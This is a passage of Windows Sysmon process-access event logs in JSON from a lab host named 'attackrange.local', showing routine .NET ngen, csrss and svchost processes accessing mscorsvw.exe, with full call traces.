\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.241\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-0010FBC60B00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.241","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-0010FBC60B00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.241\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223A-5F25-0000-0010FBC60B00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.241","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223A-5F25-0000-0010FBC60B00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001031E50C00}\r\nTargetProcessId: 2940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001031E50C00}","TargetProcessId":"2940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.288\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.288","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.288\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.288","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.288\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222E-5F25-0000-00109D160B00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.288","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222E-5F25-0000-00109D160B00}","TargetProcessId":"2988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.351\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101DEC0C00}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:34.351","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-00101DEC0C00}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:34.351\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-00101DEC0C00}\r\nTargetProcessId: 1052\r\nTargetImage: 